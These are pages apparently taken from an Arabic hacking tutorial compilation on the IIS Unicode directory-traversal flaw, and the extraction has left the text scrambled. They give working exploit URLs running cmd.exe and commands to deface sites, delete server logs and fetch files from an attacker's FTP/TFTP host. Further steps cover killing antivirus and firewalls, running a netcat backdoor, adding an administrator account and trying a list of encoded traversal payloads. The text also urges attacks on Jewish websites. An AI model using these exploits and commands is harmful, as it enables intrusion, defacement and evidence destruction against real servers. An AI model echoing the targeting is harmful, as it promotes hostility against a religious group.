‬‬ ‫انتهى‪،،،‬‬ ‫‪120‬‬ .‫‪ 5‬لبدء الفحص‬ ‫‪ 6‬لليقاف‬ ‫‪ 7‬شاشة العمليات الجاريه من فحص الثغرات على الموقع‬ ‫‪ 8‬الثغرات الموجوده على الموقع التي نجح اختبارها‬ ‫‪ 9‬لمسح شاشه العمليات و النتائج لعاده البحث مره اخرى على ثغرات اخرى‬ ‫‪ 10‬ال‬ ‫‪ 11‬منفذ ال‬ ‫ملحظ ‪11 10 :‬‬ ‫اذا ما عرفت ال فيجب عليك مسح البيانات‬ ‫‪ 12‬للخروج‬ ‫ملحظه هامه ‪:‬‬ ‫ل تنسو المواقع اليهودية التي تنتظر من يخترقها فأرجو عدم استخدامه ضد الموقع العربية او السلمية‪.

‬‬ ‫ كيفية معرفة مشكلة الـ ‪ Access Denied‬والحلول المتبعة لها ‪. ECHO‬‬ ‫طريقة نسخ ملف الـ ‪ CMD‬لتاحة امكانية الكتابة على الملفات‬ ‫‬‫‪.‬‬ ‫‪-‬‬ ‫‪121‬‬ .‬‬ ‫‬‫كيفية ايجاد هذه الثغرات ‪.‬‬ ‫‬‫كيفية اختصار ثغرة اليونيكود حتى تتمكن من تفعيل امر الـ‬ ‫‬‫‪.‬‬ ‫‬‫الوامر المستخدمة بواسطة ملف ‪.‬‬ ‫‬‫تغيير الصفحة الرئيسية للموقع وعملية الب لوود بواسطة‬ ‫‬‫برنامج ‪.‬‬‫كيفية عمل اكاونت للدخول بواسطة الـ ‪.‫" الختراق عن طريق اليونيكود )الجزء الول( "‬ ‫>ةةةةة<‬ ‫>ةةةةةة‪<sNiper_hEx :‬‬ ‫يحتوى الدرس الول على ) ‪ 13‬نقطة ( وهي كما يلي ‪-:‬‬ ‫تعريف باليونيكود ‪. CMD‬‬ ‫‬‫طريقة تطبيق هذه الثغرات ‪.‬‬ ‫‬‫تاريخ ظهور هذه الثغرة ‪.‬‬ ‫‬‫كيف يتم استغلل ثغرات اليونكود ‪. TFTP‬‬ ‫مسح ملفات اللوق حتى ل يتم التعرف عليك ‪. FTP‬‬ ‫‬‫طريقة كشف باسورد الدمينستريتور ‪.

exe?/c+echo+sNiper_hEx+>c:\hEx.exe?/c+move+c:\winnt\system32\cmd.‬امر انشاء دليل جديد‬ ‫‪%c0%af.‬‬ ‫‪-2‬‬ ‫ددد ددد ددددددد ددددد دددددددد ‪.e‬‬ ‫\‪xe+c:‬‬ ‫‪: http://www.‬‬ ‫‬‫اليونيكود عبارة عن مجموعة من الثغرات في مجموعة خدمة المعلومات التي ركبت مع‬ ‫والذي ياتي عادة مع ‪.‬المر المستخدم لرؤية محتويات الملف‬ ‫‪%c0%af..ex‬‬ ‫‪e‬‬ ‫‪:‬المر المستخدم للنقل‬ ‫‪http://www./../.com/msadc/./...%c0%af.‬‬ ‫بواسطة تطبيق الثغرة على الموقع مباشرة ‪..%c0%af...‬‬ ‫‪%c0%af.txt‬‬ ‫‪:‬المر المستخدم لعملية سحب أي ملف‬ ‫‪122‬‬ . CMD‬‬ ‫‬‫الوامر المستخدمه بواسطة ملف الـ ‪ CMD‬وهي امر لنشاء دليل جديد وامر للغاء دليل وامر النسخ‬ ‫وامر النقل وامر الحذف وامر تغيير اسماء الملفات وامر لرؤية محتويات الملف وامر الكتابة داخل أي‬ ‫ملف وامر لسحب أي ملف ‪ ،‬وهي حسب المثلة التالية ‪-:‬‬ ‫‪: http://www.%c0%af..xxxx..com/msadc/...xxxx. NT4 / Win2k‬‬ ‫‪IIS4..exe?/c+type+c:\hEx.exe+c:\inetpub\scripts\hEx./winnt/system32/cmd./.com/msadc/.0 / IIS5./winnt/system32/cmd.xxxx.‬‬ ‫‪%c0%af.%c0%af.exe?/c+rd+c:\hEx‬‬ ‫للمعلومية‪:‬ليمكن الغاء أي دليل ال اذا كان فارغا ً تمام من الملفات والمجلدات‬ ‫‪:‬المر المستخدم للنسخ‬ ‫‪http://www.‬‬ ‫‬‫يتم ايجاد هذه الثغرات بطريقتين ‪-:‬‬ ‫بواسطة البرامج اللزمة والمخصصة لكشف هذه الثغرات سواء بالبرامج التي‬ ‫‪-1‬‬ ‫تعمل على نظام ويندوز او بطريقة الشل والتي تعمل على نظام لينكس ‪./winnt/system32/cmd.com/msadc/.com/msadc/...‬‬ ‫‬‫عند تطبيق الثغرة على نظام الـ ‪ IIS4 / IIS5‬يبدا ملف ‪CMD‬بفك شفرة اليونكود في المثال الخطاء‬ ‫ومن هنا يتم استغللها ‪.../winnt/system32/cmd.‬امر الغاء دليل‬ ‫‪%c0%af.exe?/c+copy+c:\winnt\system32\cmd.txt‬‬ ‫‪:‬المر المستخدم للكتابة داخل أي ملف‬ ‫‪http://www..‬المر المستخدم لتغيير مسمى الملفات‬ ‫‪%c0%af./winnt/system32/cmd../winnt/system32/cmd.xxxx..0‬‬ ‫ددددد دددد ددد دددددد ‪./winnt/system32/cmd./winnt/system32/cmd..‬‬ ‫ددددددد ددددددددد دددددد ددد ‪.‬‬ ‫ددددد ددددد ددد ددددددد ‪.com/msadc/.htm+hEx.‬المر المستخدم للحذف‬ ‫‪%c0%af.exe?/c+md+c:\hEx‬‬ ‫‪: http://www..xxxx.mdb‬‬ ‫‪: http://www...‬‬ ‫‬‫ليوجد تاريخ محدد لظهور اول ثغرة لليونيكود لذا يعتبر ظهورها بواسطة شخص مجهول ‪anonymous‬‬ ‫‪ ، person‬وقيل ان اول ظهور لثغرات اليونيكود كانت بواسطة الصينين ولكن ليوجد مايثبت صحة هذا الكلم‬ ‫لهذه الثغرات ‪ ،‬فتم استغلل هذه الثغرات من قبل المخترقين وتطوير البرامج اللزمة لها ‪..exe?/c+del+c:\hEx.‬‬ ‫‪%c0%af.xxxx.%c0%af.xxxx.xxxx../.exe+c:\inetpub\scripts\hEx..‫ددددد دددددددددد ‪.htm‬‬ ‫‪: http://www.exe?/c+ren+c:\index.com/msadc/.com/msadc/.

..‬‬‫تتم معرفة مشكلة الـ ‪ Access Denied‬من خلل المحاولة في حذف أي ملف من أي امتداد ‪ ،‬فعند‬ ‫ظهور رسالة الـ ‪ Access Denied‬فاليك هذه الطرق حتى تتمكن من الكتابة على الملفات والتحكم‬ ‫اكثر على السيرفر ‪-:‬‬ ‫الطريقة الولى نسخ ملف الـ ‪ CMD‬الى دليل السيكربت بمسمى ‪ CMD1‬فسوف يتاح لك‬ ‫‪-1‬‬ ‫امكانية الكتابة باستخدام المر ‪ Copy‬باستخدام هذا المر ‪-:‬‬ ‫‪123‬‬ .exe?c+dir+c‬‬ ‫ ددددد ددددد ددددد ددد ‪ Access Denied‬ددددددد ددددددد ددد ‪..xxxx.%c1%8s.%c0%af.%c0%af.%c0%af.%c0%af.co‬‬ ‫‪m+>+c:\inetpub\wwwroot\index..htm‬بحيث يكون المر بالشكل التالي ‪-:‬‬ ‫‪http://www.xxxx.exe‬‬ ‫بعد نسخ ملف ‪ w3svc.com/scripts/.../winnt/system32/cmd.%c1%pc.%c0%9v../winnt/system32/cmd./.%c0%af.exe+c:\inetpub\scripts\w3svc. ECHO‬‬ ‫في حالة اكتشاف موقع يعاني من مشكلة اليونيكود ولنفترض انه كان على هذه‬ ‫الثغرة ‪-:‬‬ ‫‪\:http://www.mdb‬‬ ‫ددددد ددددد ددد ددددددد ‪.‬‬ ‫الغرض من نسخ ملف الـ ‪ CMD‬وهو لعطاء امكانية للكتابة داخل السيرفر في بعض الحالت ويتم نسخه‬ ‫الى مجلد السيكربت بهذه الطريقة ‪-:‬‬ ‫‪CMD‬‬ ‫دددددد ددددددد ددددددد ددد‬ ‫?‪http://www.exe‬‬ ‫الن بامكاننا استخدام ملف الـ ‪ CMD‬الجديد في الثغرة بدل من الول بهذا الشكل ‪-:‬‬ ‫‪\:http://www.xxxx.%c1%9c. cgi-bin‬‬ ‫ددددد دددددد دددد ددددددددد ددد ددددد دد ددددد ددد‬ ‫‬‫ددد ‪./winnt/system32/cmd.exe?/c+dir+c‬‬ ‫الن نستطيع الكتابة داخل أي ملف وبالتحديد الملف الرئيسي للموقع الذي غالبا‬ ‫مايكون في هذا الدليل‬ ‫‪ inetpub\wwwroot\index.‬‬ ‫‬‫تطبيق الثغرة على الموقع من خلل المتصفح تتم حسب المثلة التالية ‪-:‬‬ ‫‪\:http://www.com/scripts/..%c0%af../winnt/system32/cmd..xxxx.htm‬‬ ‫ددددد ددد ددد ـــ‬ ‫‬‫ددددددد ‪.xxxx. samples .exe+c:\inetpub\scripts\cmd1.%c0%af.com/scripts/.com/scripts/.xxxx././.exe‬‬ ‫‪c+copy+c:\winnt\system32\cmd..%c0%af.xxxx.xxxx./winnt/system32/cmd.exe?/c+dir+c‬‬ ‫فنحتاج الى نسخ ملف‬ ‫الطريقة ‪-:‬‬ ‫‪w3svc.exe?/c+dir+c‬‬ ‫‪\:http://www.xxxx.xxxx...exe?/c+echo+Hacked+By+sNiper_hEx+hExRay@Hotmail.xxxx.exe?/c+dir+c‬‬ ‫‪\:http://www.%c0%af.com/msadc/../winnt/system32/cmd.xxxx../winnt/system32/cmd..xxxx.com/msadc/..exe?/c+dir+c‬‬ ‫‪\:http://www.com/msadc/../winnt/system32/cmd.%c0%qf.%c1%1c....‫عليك القيام اول ً بنسخ الملف المراد سحبه الى أي دليل وبعدها يتم كتابة اسم الملف‬ ‫‪:‬في اخر العنوان كالتالي‬ ‫‪http://www.. iisadmpwd ./winnt/system32/cmd..com/scripts/w3svc..com/scripts/../winnt/system32/cmd. _vit_admin . scripts .exe?/c+dir +c‬‬ ‫وقد نحتاج الى تغيير مسمى الدليل بحيث يكون ‪-:‬‬ ‫‪Msadc ./winnt/system32/cmd1.xxxx...exe‬‬ ‫‪c+copy+c:\winnt\system32\cmd. _vti_bin ./.exe‬‬ ‫الى مجلد‬ ‫‪inetpub\scripts‬‬ ‫والمر يكون بهذه‬ ‫?‪http://www...exe?/c+dir+c‬‬ ‫‪\:http://www.exe?/c+dir+c‬‬ ‫‪\:http://www.exe?/c+dir+c‬‬ ‫‪\:http://www.com/msadc/hEx.com/scripts/.com/msadc/..com/scripts/w3svc.exe‬الى مجلد‬ ‫خلل الثغرة بهذه الطريقة ‪-:‬‬ ‫‪inetpub\scripts‬‬ ‫‪ ،‬الن نقوم بتصفح الموقع من‬ ‫‪\:http://www.com/scripts/.

%c0%af./winnt/system32/cmd.htm‬ثم‬ ‫‪-8‬‬ ‫يدرج هنا بدون المسج السابق‬ ‫‪shell.com/test. Access Denied‬‬ ‫‪o‬‬ ‫اذا ظهرت لك صفحة الخطاء رقم ‪ 500‬فمعناها انك لم تقم بتطبيق الطريقة‬ ‫‪o‬‬ ‫بالشكل الصحيح وعليك اعادة المحاولة ‪.host.host.Com+>>+c:\winnt\mspft.pll‬‬ ‫‪-5‬‬ ‫‪shell.‬‬ ‫البحث عن ملفات ‪ root.]AA#--‬بحيث ان‬ ‫‪o‬‬ ‫حرف ‪ A‬يتم كتابتة حتى يتعدى ‪ 2049‬حرف ‪..com/msadc/.ppl/‬‬ ‫الن مطلوب اضافة مجهول ‪ Anonymous‬الى نفس الملف الذي قمنا بانشاءه‬ ‫‪-3‬‬ ‫‪mspft.exe‬حتى يتم الستفادة من ثغرة‬ ‫‪c+copy+c:\winnt\system32\cmd.pll‬‬ ‫‪shell.exe?/c+echo+get+index..xxxx.ppl/‬‬ ‫الن مطلوب ادراج البريد ‪ hExRay@Hotmail.com‬‬‫ ‪Anonymous‬‬‫ ‪hEx@Hotmail.‬‬ ‫الطريقة الثالثة باستخدام برنامج ‪ NC.ppl/‬‬ ‫الن يكتب اوامر الـ ‪ FTP‬اللزمة لسحب الملف من خادم الـ ‪ FTP‬وهي ‪ Get index. FTP‬‬ ‫نسخ ملف ‪ CMD‬الى مجلد ‪ Scripts‬باسم ‪ Shell.exe ، shell.dll‬والطريقة كما يلي ‪-:‬‬ ‫‪-2‬‬ ‫اول انشاء صفحة باسم ‪test.ppl/‬‬ ‫هنا نفس السابق ولكن باضافة ‪Quit‬‬ ‫‪-9‬‬ ‫‪shell.‫?‪http://www.xxxx.exe‬‬ ‫‪c+copy+c:\winnt\system32\cmd.g‬‬ ‫‪shell.exe+c:\inetpub\scripts\cmd1./.‬‬ ‫الن يتم طلب الصفحة من خلل المتصفح ‪http://www.exe?/c+echo+anonymous+>>+c:\winnt\mspft.%c0%af.pll‬بواسطة المر ‪ Echo‬وكتابة فيه التالي ‪open‬‬ ‫‪-2‬‬ ‫‪ ftp.com+>+c:\winnt\mspft.exe‬‬ ‫الطريقة الثانية بالتعامل مع الملف ‪ ssinc.html+>>+c:\winnt\mspft..Com‬الى نفس الملف الذي قمنا بانشاءه‬ ‫‪-4‬‬ ‫‪mspft.exe‬بحيث يتم عمل اب لوود لهذا الملف داخل مجلد‬ ‫‪-3‬‬ ‫الـ ‪ Temp‬في دليل الويندوز ومنه يتم تنفيذ الوامر من خلل موجة الدوز وللمعلومية مجلد الـ ‪Temp‬‬ ‫مفتوح لعمليات الب لوود ‪.shtml‬‬ ‫‪o‬‬ ‫كتابة هذا الكود داخل الصفحة >!‪ <--"include file="AAAA[..exe?/c+echo+hEx@Hotmail.Com‬‬‫‪User Anonymous -‬‬ ‫‪124‬‬ .ppl‬باحتوائها على مايلي ‪-:‬‬ ‫ ‪Open FTP.ppl‬وهو عبارة عن خطوات قمنا بانشاءها‬ ‫وموجودة في ملف ‪ mspft.‬‬ ‫‬‫‪-1‬‬ ‫قديمة‬ ‫ددددد ددد دددددد دددددد دددددد ددد ‪.com‬حيث ان هذا هو الخادم للـ ‪.exe?/c+echo+lcd+c:\inetpub\wwwroot+>>+c:\winnt\mspft.exe?/c+echo+quit+>>+c:\winnt\mspft.exe+c:\inetpub\scripts\shell..shtml‬‬ ‫‪o‬‬ ‫تكون هذه الصفحة داخل مجلد ‪wwwroot/hEx/test.exe ، sensepost.exe :‬ونسخها الى مجلد‬ ‫‪-5‬‬ ‫‪ c:\inetpub\scripts‬وتطبيق الثغرة من خللها ‪.shtml‬‬ ‫‪o‬‬ ‫الن سوف تظهر لك الصفحة ‪.exe?/c+echo+user+anonymous+>>+c:\winnt\mspft.pll‬‬ ‫‪shell.ppl/‬‬ ‫يتم هنا ادراج الموقع الحالي للملفات‬ ‫‪.ppl/‬‬ ‫إضافة ‪ User‬قبل ‪ Anonymous‬لزوم الملف الذي قمنا بانشاءه ‪mspft.exe/‬‬ ‫انشاء ملف ‪ mspft.ppl/‬‬ ‫الن تكرار لحاجة العداد‬ ‫‪-6‬‬ ‫‪shell.ppl/‬‬ ‫‪ -10‬الن يتم تنفيذ امر ‪ ”FTP.‬‬ ‫‪o‬‬ ‫الن تستطيع الكتابه وتم تخطي مشكلة الـ ‪.‬‬ ‫الطريقة الرابعة وهي من خلل عمل كراش للسيرفر باستخدام البرامج اللزمة لهذا‬ ‫‪-4‬‬ ‫الغرض وهذه الطريقة غير مجديه في كثير من الحيان ‪.exe?/c+echo+hEx@Hotmail. FTP‬‬ ‫‪c+echo+open+ftp.host.exe?+"-s:c:winnt\mspft.exe ، w3svc..Com+>>+c:\winnt\mspft.

DLL‬‬ ‫اذا كان السيرفر يعتمد في القراءة باستخدام صفحات الـ ‪ ASP‬للوصول الى البيانات من‬ ‫‬‫الـ ‪ MySQL‬فسوف نحتاج الى تطبيق ثغرة ) ‪ ( htr.html‬‬ ‫‪-‬‬ ‫‪Quit‬‬ ‫‪"msadc/..‬‬ ‫ددددد دددددد دددددددد دددددد دددددد دددد دددد‬ ‫‬‫دددددد دددددد ‪.SAM‬في دليل \‬ ‫‬‫‪ \winnt\repair‬وافضل برنامج لفك شفرة الباسورد هو برنامج ‪ L0phtCrack‬كما هو موضح بالشكل‬ ‫التالي‪-:‬‬ ‫اذا كان هناك مستخدمين في السيرفر ويوجد لديهم حساب فان معلوماتهم سوف تكون في‬ ‫‬‫ملف ‪ PASSFILT./.asp+.DLL‬ونستطيع تحديد مسار هذا الملف من خلل الريجستري بواسطة هذا المفتاح ‪-:‬‬ ‫‪HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\SYSTEM32\PASSFILT.exe?+"-s:c:\winnt\mspft.inc‬وقراءة محتوياته للعثور على اسم‬ ‫المستخدم والباسورد للمسئول عن قاعدة البيانات ‪.‫‪-‬‬ ‫‪hEx@Hotmail.‬‬ ‫‪125‬‬ .+‬للوصول الى باسورد‬ ‫خلل قاعدة‬ ‫المسئول عن هذة القاعده وهي كالتالي ‪-:‬‬ ‫‪http://www.%c0%af.%c0%af.‬‬ ‫‬‫نحتاج الى وجود برنامجين ) ‪ ( Microsoft Access – L0phtCrack‬وهي لزوم تنفيذ بعض‬ ‫الخطوات لتالية وهي ‪-:‬‬ ‫باسورد الدمينستيتور للسيرفر يكون موجود في ملف الـ ‪ _.htr‬‬ ‫عند ظهور صفحة الخطا في الوصول الى الصفحة المطلوبة وبالتحديد في سيكربت التنفيذ فالطريقة‬ ‫صحيحة وماعلينا فقط سوى سحب ملف ‪ database..htm‬على الـ ‪\:c‬‬ ‫‪ -2‬قم بتشغيل برنامج ‪ TFTP‬ونفذ المر في الفقرة التالية ‪..Com‬‬ ‫‪-‬‬ ‫‪Get index. TFTP‬‬ ‫‪ -1‬قم بانشاء صفحة وضع شعارك عليها واحفظها باسم ‪ index.xxxx.com/default../winnt/system32/ftp.ppl/‬‬ ‫ددددد ددد دددددد دددددددددددددد ‪.

log/‬‬ ‫انتهى ‪،،،‬‬ ‫" الختراق عن طريق اليونيكود )الجزء الثاني( "‬ ‫‪126‬‬ .htm/‬‬ ‫وهو البرنامج اللزم لعمل الب لوود ويجب ان يكون شغال في حالة تنفيذ المر‬ ‫‪tftp.1.‫‪c+tftp.1.exe‬‬ ‫وهو بمثابة باراميترز لزوم قراء البيانات في مكتبة الملفات‬ ‫"‪"i-‬‬ ‫رقم اليبي الخاص بك‬ ‫‪1.1.htm‬‬ ‫ددد ددددد ددددد ددد دد ددد دددددد دددد ‪.1.htm‬‬ ‫اسم الدليل في السيرفر‬ ‫\‪\inetpub\wwwroot‬‬ ‫اسم الملف على السيرفر‬ ‫‪index.‬‬ ‫‬‫وتتم هذه العملية من خلل حذف ملفات الـ ‪ Log‬من مجلد ‪ System32‬بواسطة المر ‪-:‬‬ ‫‪c+del+c:/winnt/system32/logfiles/*.1+GET+index.htm+C:\inetpub\wwwroot\index.1‬‬ ‫وهو المر اللزم لطلب الملفات مابين الرسال والستقبال‬ ‫‪GET‬‬ ‫اسم الملف بجهازك‬ ‫‪index.exe+"-i"+1.

‬‬ ‫‪Kill. Echo‬‬ ‫وبعد ذلك نفذ الثغرة من الملف الجديد ‪ ) CMD1.exe‬وملحقاتها ‪.exe‬والسبب هو تفعيل امر الكتابة ‪.exe‬‬ ‫‪Tlist.‬اما في هذا الدرس فالمر يتطلب‬ ‫بعض الذكاء والمهارة ‪..‬والفائده منها هو اقفال الفايروول ‪ +‬النتي‬ ‫فايروس ‪(:‬‬ ‫‪ Kill. (:‬‬ ‫‪ Tlist .‬‬ ‫البداية ‪:‬‬ ‫‪-------------‬‬‫عند وجود موقع مصاب بثغرة ما )يونيكود( فان اول شي عليك القيام به هو نسخ مجلد ‪ cmd‬الى ‪cmd1‬‬ ‫بهذه الطريقة ‪:‬‬ ‫‪+C+copy+c:\winnt\system32‬‬ ‫‪ c:\winnt\system32\cmd1..exe‬‬ ‫‪ncx99.exe‬‬ ‫‪tftpd32....‬يستطيع من خلله اغتصاب عملية تابعه لمدير النظام يقوم‬ ‫من خللها برفع امتيازاتك ‪. (:‬‬ ‫لتوفير الوقت جمعتها في مجلد واحد هنا‬ ‫الن سأشرح عمل كل اداة ‪:‬‬ ‫‪ Sechole ..‬‬ ‫‪ +‬الملفات المطلوبة ‪:‬‬ ‫‪ Sechole.‫>ةةةةة ةة ةةةةةةة ةةةة ةةةةة ةةةةةةةةة<‬ ‫في الدرس الول كان عبارة عن اوامر اساسية يستطيع الجميع تطبيقها ‪ .exe -3‬عملها متمم للداة السابقة حيث ستقوم باقفال رقم العملية المستخرج من الداة السابقة ‪..‬من خلل هذه الثغرة فانه سيكون لديك صلحيات‬ ‫‪ IWAM_USER‬وهذا المستخدم هو عبارة عن يوزر ينتمي للمجموعه ‪ Guest‬وهو اليوزر المسؤوول‬ ‫عن تشغيل سيرفر ‪.‬وانا اكتب هذا الموضوع لشرح كيفية احكام السيطرة على السيرفر والحصول على حساب مكافيء‬ ‫للمدير ‪ (:‬والتمتع بجميع موارد النظام ‪.‬‬ ‫‪ NCX99 -3‬نسخه مطورة من الباكدوور ‪ NC‬ينصت على المنفذ ‪99‬‬ ‫‪ TFTP32..exe‬‬ ‫جهز العده ‪.‬وطريقة عمله )بشكل مبسط(‬ ‫بأنه يعتمد على صدع في نواة ويندوز ان تي ‪ .exe -4‬لنقل الملفات الى السيرفر ‪.‬‬ ‫‪127‬‬ ..2‬تقوم بعرض جميع العمليات التي تعمل بالخلفيه ‪ ..1‬وهو اقوى استثمار موجود لرفع المتيازات بشكل محلي ‪ . IIS‬‬ ‫وبما انه من مجموعة ‪ Guest‬فهو ل يملك صلحيات كثيرة !! ال اذا تم اعداده بشكل سيء ‪(:‬‬ ‫ليوجد شي اكثر ادمانا من محاولة الحصول على رووت ‪ (:‬هذا في انظمة *‪ nix‬اما في ‪Microsot‬‬ ‫فالوضع مختلف ‪ (:‬فإن محاولة الحصول على صلحيات ‪ Administrator‬ليس بالسهولة التي تتوقعها ‪(:‬‬ ‫فرفع المتيازات بشكل محلي في انظمة مايكروسوفت ممكن فقط بطرق قليلة ل يتعدى عددها اصابع اليد‬ ‫الواحده ‪ ..exe‬هذا شي يعرفه الجميع ( لكن للتذكير فقط !‬ ‫الن عند تصفحك لملفات الموقع من المتصفح ‪ .

‬‬ ‫بما اننا لدينا حساب مكافي لـ ‪ Administrator‬ولكننا ل نملك كلمة المرور ‪ .exe‬‬ ‫بعد ذلك قم بالتصال بالموقع على البورت ‪.‬‬ ‫الن قم بقتل الجراء بالداة ‪ Kill‬بهذا الشكل ‪ .\inetpub\wwwroot\index+‬‬ ‫‪htm.. Access Denided‬‬ ‫وطبعا اهم شي الكتابة على الصفحه الرئيسية بامر اليكو ‪:‬‬ ‫‪+C+Echo+Hacked+by+XDeMoNX‬‬ ‫< ‪C. TLIST‬ستعرض لك جميع العمليات التي تعمل ‪ ..‫كل ما سبق كان عبارة عن مقدمه ‪ (:‬اما العمل الحقيقي سيبدأ الن ‪:‬‬ ‫اول قم برفع جميع الدوات السابق الى السيرفر ‪....‬إلخ ‪(:‬‬ ‫سؤال ‪ :‬هل تستطيع الدخول بهذا اليوزر ؟ ‪ IWAM_USER‬الى اي خدمه مثل تلنت او اف تي بي ؟؟‬ ‫الجابة ‪ :‬ل ‪ .‬لكن يوجد ماهو اسهل ‪.‬‬ ‫القراصنه الذكياء ل يبحثون فقط عن تغيير الصفحه الرئيسية خصوصا اذا كان الموقع مهم او يحتوي على‬ ‫معلومات او قواعد بيانات ‪ .exe PID :‬مكان ‪ PID‬تضع رقم العملية ‪(:‬‬ ‫يسأل البعض ! مالهدف من اقفال النتي فايروس ؟ الجابة ‪ .‬صحيح اننا قمنا برفع امتيزاته لكننا ل نملك كلمه المرور ! لنه تكون مسنده بشكل عشوائي ‪..‬وكذلك اذا وجدت جدار ناري ‪.‬‬ ‫ولكن ليس هذا كل شي ‪..‬‬ ‫قم الن برفع الملف ‪ add..‬اف تي بي او تلنت او نت بيوس او غيرها ‪(:‬‬ ‫ل تنسى في النهاية مسح الثار واضافة البواب الخلية الخاصة بك لتسهيل الدخول في المرات القادمه ‪(:‬‬ ‫طبعا لن اتوسع في هذا الجانب لنه ) لكل شيخ طريقة!( وكل واحد له اسلوب في اخفاء ادواته والتحكم في‬ ‫الملفات ‪.. Guest‬‬ ‫الن قم بتشغيل الداة ‪ .À¯...‬‬ ‫هل تذكر اني طلبت منك اقفال الفايروول ؟؟ لماذا ؟‬ ‫لو جربت تنفذ المر ‪ netstat -an‬من خلل سطر اوامر الن سي ‪ .‬فانك ستجد من المنافذ ما يسر‬ ‫القلب ‪(:‬‬ ‫‪ 90%‬من السيرفرات اللي دخلتها وكانت محمية بجدران نار ‪ (:‬وجدت المنفذ ‪ 139‬فيها مفتوحا بدون حمايه‬ ‫‪128‬‬ . KILL.bat‬ثم تشغيلها من المتصفح )بواسطة اليونكود(‬ ‫الن لديك حساب مدير ‪ (:‬وتستطيع الدخول الى اي خدمه ‪ ..bat‬‬ ‫توضيح ‪ :‬ما فعلناه سابقا هو انشاء مجلد دفعاتي يقوم بانشاء يوزر جديد ‪ Demon‬وكلمة مرور ‪Pass‬‬ ‫واضافته الى مجموعة الدمنستريتورز ‪ (:‬المدراء ‪. Administrators‬‬ ‫الن بإمكانك تنفيذه جميع الوامر بكامل الحريه وبدون اي مشاكل في الصلحيات ‪. add...‬‬ ‫عندها سيتم رفم امتيازات ‪ IWAM_USER‬الى مجموعه ‪..‬‬ ‫سجل رقم ‪ PID‬الخاص بالنتي فايروس والفايروول على ورقه جانبيه ‪./winnt/system32/cmd1.‬‬ ‫نرجع لنقطة سابقة ‪.‬‬ ‫ثم قم بتشغيل ‪ ncx99.exe‬بهذا الشكل مثل ‪:‬‬ ‫‪http://target/scripts/...exe‬من المتصفح ‪.. 99‬‬ ‫ستحصل على سطر اوامر ‪ CMD‬بدون امتيازات = ‪..‬قم بتشغيل‬ ‫‪ (: Sechole.‬‬ ‫سيذهب تفكير البعض الى الحصول على ملف السام وكسره ‪ (:‬هذا ممكن ‪ .exe?/c+C:\ncx99..‬والن بعد اتمام العمليات السابقة بنجاح ‪ .‬أن التحديثات الخيرة من انتي فايروس تتعامل‬ ‫مع ‪ Sechole‬على انه باكدور ‪ ...‬ما رأيك بإضافه يوزر جديد‬ ‫باسمك مع باسورد خاصه بك مع امتيازات المدير ايضا !! ‪ (:‬قليل من الذكاء والتفكير ‪(:‬‬ ‫قم بانشاء مستند نصي جديد واضف السطر التالي ‪:‬‬ ‫‪net user Demon pass /add && net localgroup administrators Demon /add‬‬ ‫والن ‪ Save as‬واحفظها باسم ‪.‬قم بالبحث عن رقم العملية ‪PID‬‬ ‫الخاص بالنتي فايروس ان وجد ‪ ..

. WINvnc‬‬ ‫انتهى‪،،،‬‬ ‫" معلومات عامة عن كيفية الستفادة من ثغرات اليونيكود "‬ ‫‪129‬‬ .‫‪(:‬‬ ‫لذا فان اقفال الفايرول قد يجعل لك اكثر من خيار لسقاط الهدف ‪(:‬‬ ‫اسف على النحو الملء ‪ .‬والتنسيق الـ أي كلم ‪ (:‬واختصار المعلومات ايضا ‪.‬اذا وجدت وقت فراغ فسأكتب عن طرق اخرى وادوات اخرى مثل‬ ‫‪ GEtAdmin‬و ‪ Sechole2‬وكيفية الحصول على تحكم رسومي بواسطه الداة ‪.‬‬ ‫بالمكان الستعراض اكثر من ذلك بكثير ‪ ...‬الى درجة الحصول على تحكم رسومي ‪.. GUI‬‬ ‫لكن لم يكون لدي الوقت الكافي ‪ .

%%35c.%%35c../winnt/system32/cmd./winnt/system32/cmd.%%35%63.<‫>ةةةةة‬ <‫ ةةةة ةةةة‬:‫>ةةةةةة‬ ‫الموضوع يتكلم عن اساليب التحكم في السيرفر عبر اليونيكود مع بعض المتطلبات‬ : ‫الدوات المطلوبه‬ ‫( اداة مسح ثغرات يونيكود‬1 TFTPD ‫( برنامج سيرفر‬2 ‫( معرفة جيده باليونيكود‬3 ================================================= ================================================= ‫( بأمكانك الحصول على ثغرات اليونيكود من العديد من المواقع او من موقعي‬1 /http://www...%%35c.%%35c.%%35%63.exe?/c+dir+c msadc/.../winnt/system32/cmd..%252fwinnt/system32/cmd./ \:%255cwinnt/system32/cmd.exe?/c+dir+c 130 ....%25%35%63winnt/system32/c \:md...exe?/c+dir+c MSADC/.%255c.../ %25%35%63...%255c././../ %25%35%63..%/ \:%35cwinnt/system32/cmd.%255c./../winnt/system32/cmd....%255c.%255c.exe?/c+dir+c vti_bin/..%255c.%/ \:%35%63.%%35%63.%%35%63.%25%35%63./ \:%255cwinnt/system32/cmd.exe?/c+dir+c MSADC/...%255c.%/ \:%35%63winnt/system32/cmd.exe?/c+dir+c MSADC/.exe?/c+dir+c/ \:scripts/..%255cwinnt/system32/cmd.../winnt/system32/cmd./winnt/system32/cmd../winnt/system32/cmd.exe?/ \:c+dir+c MSADC/.%255c././../...exe?/c+dir+c/ msadc/.exe?/c+dir+c/ msadc/..%25%35%63.%252f./ %25%35%63.%25%35%63......%25%35%63.%252f.%25%35%63winnt/system32/c \:md.%255c.%255c./....._/ \:%255c.%%35%63..exe?/ \:c+dir+c msadc/...%255c..exe?/c+dir+c/ \:scripts/....exe?/c+dir+c/ \:msadc/...%%35%63..%%35c.%%35c..%255c...%_/ \:%35%63.././..%255c...%255c./.%_/ \:%35c.%25%35%63..exe?/c+dir+c vti_bin/.%%35%63./ %25%35%63..../winnt/system32/cmd..exe?/c+dir+c msadc/./winnt/system32/cmd.exe?/c+dir+c vti_bin/.devil2k..exe?/c+dir+c msadc/........%%35%63.%25%35%63......%252f.com (( ‫وهذه مهداه مني انا )) بلك هنتر‬ \:msadc/...%255c..%%35%63.%255cwinnt/system32/cmd..%%35c.exe?/c+dir+c \:scripts/.././.%25%35%63.%%35c.%/ \:%35c.%%35c.%255c.....%255c..%255c.%25%35%63.

